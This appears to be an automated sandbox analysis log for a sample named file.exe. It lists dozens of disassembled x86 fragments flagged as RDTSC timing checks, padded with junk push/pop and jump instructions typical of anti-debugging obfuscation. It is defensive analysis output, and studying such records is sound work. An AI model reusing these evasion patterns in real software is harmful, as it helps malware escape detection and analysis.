Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC317A second address: BC3194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F08C0C91956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3620 second address: BC362F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB452Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC362F second address: BC363D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC363D second address: BC3641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3920 second address: BC393C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91964h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC393C second address: BC3940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3940 second address: BC3944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3944 second address: BC394C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC394C second address: BC396A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91968h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC396A second address: BC3984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4536h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC6EC6 second address: BC6ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC6ECC second address: BC6ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC6761 second address: BC6781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C9195Dh 0x00000009 jmp 00007F08C0C9195Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC6781 second address: BC679C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F08C0CB452Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC679C second address: BC67A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F08C0C91956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC67A6 second address: BC67D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4535h 0x00000007 jnc 00007F08C0CB4526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F08C0CB452Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC6905 second address: BC6943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F08C0C91958h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push edi 0x00000018 pop edi 0x00000019 jmp 00007F08C0C91966h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F08C0C9195Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB5C3 second address: BCB5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB5C7 second address: BCB5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB9E0 second address: BCB9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCBDE7 second address: BCBDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCBDEC second address: BCBE05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F08C0CB4526h 0x0000000a jmp 00007F08C0CB452Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3351 second address: BD3357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3357 second address: BD335B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD335B second address: BD3361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3361 second address: BD3367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD376A second address: BD3770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3770 second address: BD3774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3774 second address: BD3789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91961h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3D38 second address: BD3D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F08C0CB4530h 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD4015 second address: BD4019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD4019 second address: BD401D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD42B1 second address: BD42F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Eh 0x00000007 jmp 00007F08C0C91969h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jns 00007F08C0C91962h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD488C second address: BD4890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD9B32 second address: BD9B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD8D64 second address: BD8DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4534h 0x00000007 jmp 00007F08C0CB4536h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F08C0CB4537h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD8F1F second address: BD8F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD8F23 second address: BD8F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD8F27 second address: BD8F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C91963h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jo 00007F08C0C91956h 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 jmp 00007F08C0C91965h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD9213 second address: BD921B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD95E8 second address: BD95FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 jne 00007F08C0C91956h 0x0000000e jns 00007F08C0C91956h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFB6F second address: BDFB73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFB73 second address: BDFB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFB7C second address: BDFB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7933 second address: BE793E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F08C0C91956h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE793E second address: BE794A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F08C0CB4526h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE777F second address: BE7794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE56D5 second address: BE56DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEEEC7 second address: BEEEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F08C0C91956h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jo 00007F08C0C91956h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEEEDE second address: BEEEE8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE90A second address: BEE910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE910 second address: BEE92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F08C0CB452Bh 0x0000000b popad 0x0000000c ja 00007F08C0CB452Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE92A second address: BEE964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 popad 0x00000009 push esi 0x0000000a jmp 00007F08C0C91965h 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F08C0C91964h 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1D4 second address: BFD1DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1DA second address: BFD1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1E0 second address: BFD1F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F08C0CB452Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F08C0CB4526h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C016A5 second address: C016A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C016A9 second address: C016AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0A98A second address: C0A98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10E74 second address: C10E8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F08C0CB4531h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1916B second address: C1918A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91965h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17C56 second address: C17C79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F08C0CB4539h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C17C79 second address: C17C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1807E second address: C18086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C18086 second address: C1809C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F08C0C91961h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C18370 second address: C18380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 je 00007F08C0CB4536h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C18380 second address: C18384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CC90 second address: C1CC9A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0CB4526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CC9A second address: C1CCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0C9195Eh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 push esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1CCB9 second address: C1CCC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C36BD0 second address: C36BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39124 second address: C3912A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BBAE second address: C3BBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BBC2 second address: C3BBCE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0CB4526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5521D second address: C55223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55223 second address: C5523E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F08C0CB4530h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55BAD second address: C55BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C91967h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55D25 second address: C55D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55E95 second address: C55EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C9195Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55EA6 second address: C55ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4533h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08C0CB452Bh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55ED2 second address: C55ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55ED7 second address: C55EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57AFD second address: C57B07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C91956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57B07 second address: C57B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57B11 second address: C57B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57B17 second address: C57B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57B1B second address: C57B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57B21 second address: C57B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B998 second address: C5B9A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F08C0C91956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B9A2 second address: C5B9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F08C0CB452Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BC10 second address: C5BC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BCAF second address: C5BCD9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08C0CB4528h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, eax 0x0000000f push 00000004h 0x00000011 mov edx, dword ptr [ebp+122D2DEDh] 0x00000017 mov dh, cl 0x00000019 push 1BE325E1h 0x0000001e push eax 0x0000001f push edx 0x00000020 jnp 00007F08C0CB4528h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BCD9 second address: C5BCDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BF5C second address: C5BF62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BF62 second address: C5BF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5D82E second address: C5D861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 je 00007F08C0CB4535h 0x0000000e jmp 00007F08C0CB452Fh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 pushad 0x00000017 jmp 00007F08C0CB4530h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5D42D second address: C5D433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F37B second address: C5F399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F08C0CB4535h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F399 second address: C5F39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F39D second address: C5F3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F3A7 second address: C5F3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
